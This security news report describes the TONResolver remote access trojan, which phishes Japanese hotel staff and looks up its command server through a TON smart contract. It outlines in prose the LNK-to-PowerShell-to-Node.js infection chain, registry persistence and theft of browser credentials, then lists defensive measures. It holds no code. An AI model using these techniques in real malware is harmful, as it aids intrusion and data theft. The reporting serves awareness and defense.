TONResolver Malware Abuses TON Smart Contracts for C2 Switching
Key Takeaways A new Remote Access Trojan (RAT), dubbed TONResolver, is actively targeting Japan’s hospitality sector. The malware leverages The Open Network (TON) blockchain’s smart...
Key Takeaways
- A new Remote Access Trojan (RAT), dubbed TONResolver, is actively targeting Japan’s hospitality sector.
- The malware leverages The Open Network (TON) blockchain’s smart contracts as a “dead drop resolver” for its command-and-control (C2) server.
- This novel C2 mechanism allows attackers to dynamically change their server addresses, making the malware highly resilient to detection and takedown efforts.
- Initial infections occur via sophisticated phishing campaigns, often employing a “conversational attack” approach to build trust.
- Upon successful compromise, TONResolver collects system information and attempts to steal credentials, cookies, and browsing data from Chrome and Edge.
A sophisticated new cyberattack campaign has emerged, primarily targeting Japan’s hospitality industry. Researchers have identified a novel Remote Access Trojan (RAT), named TONResolver, which distinguishes itself by utilizing The Open Network (TON) blockchain’s smart contracts to manage its command-and-control (C2) infrastructure.
Table Of Content
Beginning in late May 2026, threat actors initiated a series of phishing attacks. These campaigns targeted Japanese companies partnered with Booking.com, employing deceptive emails that mimicked urgent guest complaints or review requests. The primary objective was to entice hotel employees into opening malicious attachments, which would then grant the attackers unauthorized remote access to their systems.
The innovative aspect of this malware lies in its C2 communication strategy. Instead of embedding a static C2 server address, TONResolver uses the TON blockchain as a “dead drop resolver.” This technique enables the attackers to update the C2 server address dynamically without modifying the malware itself, significantly enhancing its resilience against detection and disruption efforts.
Trend Micro said in a report that their analysts identified TONResolver and confirmed its functionality as a RAT. According to their findings, infected systems maintain a persistent connection to the C2 server, remaining ready to receive commands as long as the infection persists. Telemetry data indicates that Japan is currently the most affected region by these attacks.
Phishing Tactics and Initial Compromise
The attackers employed two distinct delivery methods to spread TONResolver. The first involved widespread phishing emails with subject lines designed to create a sense of urgency, such as “Important: Guest Stay Review Request.”
The second, more insidious approach, was a “conversational attack” conducted through Gmail. In this method, the attacker would send an initial, seemingly innocuous inquiry, establish rapport with the recipient, and then follow up with a malicious link. This trust-building tactic is often associated with advanced persistent threat (APT) groups.

A successful infection by TONResolver can lead to significant data compromise. Once executed, the malware gathers critical system information, including the victim’s username, hostname, operating system details, CPU count, memory specifications, and MAC address. Further analysis through managed detection and response (MDR) revealed that the malware actively attempts to steal credentials, cookies, browsing history, and autofill data stored in popular web browsers like Chrome and Edge.
TONResolver Malware Uses TON Smart Contracts
The most notable technical innovation of TONResolver is its method for locating its C2 server. Instead of a hardcoded IP address or domain, the attackers embed the C2 server’s domain within a TON smart contract. When the malware is executed, it queries the legitimate TON API endpoint, specifically tonapi[.]io, using a method called “get_domain” to retrieve the current active C2 server address.
This “dead drop resolver” mechanism provides a substantial advantage to the attackers. Should a C2 server be identified and blocked, the threat actors can simply update the domain stored within the TON smart contract. All previously infected machines will then automatically connect to the new server without requiring any alteration or redeployment of the malware itself. Analysis of transaction history on the TON blockchain has confirmed that the attackers have actively exploited this capability, making multiple C2 domain switches throughout the campaign.
The malware’s payload is a JavaScript file, executed via Node.js, a legitimate and widely trusted runtime environment. To impede static analysis, the malware employs VM-based obfuscation, transforming its logic into a custom virtual instruction set. All network communication is further secured using WebSocket with ECDH key exchange and AES-256-CBC encryption, rendering traditional packet-level inspection largely ineffective against this threat.

Infection Chain and Persistence Tactics
The infection process commences when a victim interacts with a malicious hyperlink within a phishing email, leading to the download of a ZIP archive from an attacker-controlled website. This archive contains a shortcut file (.LNK) cleverly disguised as an image file. Executing this LNK file triggers a PowerShell command, which then retrieves a PS1 script from the attacker’s server, initiating the full infection sequence.
The PS1 script is responsible for deploying the JavaScript payload and silently downloading Node.js version 24.13.0 from nodejs.org to serve as the execution environment. For persistence, the malware establishes a Windows registry Run key. It also incorporates a mutex check to prevent multiple instances from running concurrently. This combination of leveraging legitimate tools and obfuscation techniques allows TONResolver to bypass many conventional security measures.
What You Should Do
- Organizations should immediately restrict or monitor connectivity to the TON platform, specifically blocking
tonapi[.]io, to sever the dead drop resolver link. - Configure PowerShell to prevent the retrieval of external files and implement robust monitoring for Node.js processes running from unusual locations, particularly within AppData paths.
- Strengthen email security protocols, including advanced phishing detection and user awareness training, to mitigate the risk of initial compromise.
- Regularly review and update security configurations, enhance endpoint detection and response (EDR) capabilities, and refresh incident response procedures to effectively counter this evolving threat.
Indicators of Compromise (IoCs):-
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.